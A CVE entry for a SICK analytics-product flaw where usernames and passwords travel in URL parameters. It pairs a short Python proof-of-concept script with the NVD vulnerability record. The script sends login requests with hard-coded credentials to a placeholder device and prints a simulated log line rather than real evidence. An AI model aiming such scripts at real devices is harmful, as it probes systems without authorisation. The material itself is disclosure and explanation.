CVE-2025-58584

# CVE-2025-58584 PoC - Credential Exposure via URL Parameters # This PoC demonstrates how credentials are transmitted in URL parameters # in SICK products, leading to potential credential exposure import requests from urllib.parse import urlencode # Target SICK device (replace with actual target) target_host = "http://192.168.1.100" target_port = 80 # Vulnerable endpoint - credentials passed as URL parameters (INSECURE) username = "admin" password = "Admin123!" # Construct the vulnerable URL with credentials in query string vulnerable_url = f"{target_host}:{target_port}/api/login?username={username}&password={password}" print(f"[*] Sending authentication request with credentials in URL...") print(f"[*] Vulnerable URL: {vulnerable_url}") print(f"[!] WARNING: Credentials are visible in URL - will be logged!") try: # The vulnerable request - credentials in URL response = requests.get(vulnerable_url, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text[:500]}") # Demonstration of credential exposure in server logs print("\n[*] Simulating server log entry that would expose credentials:") log_entry = f'192.168.1.50 - - [06/Oct/2025:10:15:30 +0000] "GET /api/login?username={username}&password={password} HTTP/1.1" 200 1234' print(f" {log_entry}") print("[!] Credentials are now permanently stored in server access logs!") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Secure alternative - using POST with body (recommended fix) print("\n[*] Secure authentication should use POST method:") secure_response = requests.post( f"{target_host}:{target_port}/api/login", json={"username": username, "password": password}, timeout=10 ) print(f"[*] Secure Response Status: {secure_response.status_code}") print("[*] Credentials are NOT visible in URL or logs with POST method")

{"cve": {"id": "CVE-2025-58584", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:35.063", "lastModified": "2026-01-27T16:13:13.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the HTTP request, the username and password are transferred directly in the URL as parameters. However, URLs can be stored in various systems such as server logs, browser histories or proxy servers. As a result, there is a high risk that this sensitive data will be disclosed unintentionally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-598"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "E62416BA-1BF1-43BD-98B2-57BD34128419"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "04E8EA78-2780-40C0-B5BA-6CF99DE6355B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "27031959-2981-4755-9E3D-02CD083F2B72"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "5955214B-0D71-449A-BFD4-8804FDF91CA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "86C0BA69-E701-45A3-ADA5-130B8AD9DF15"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}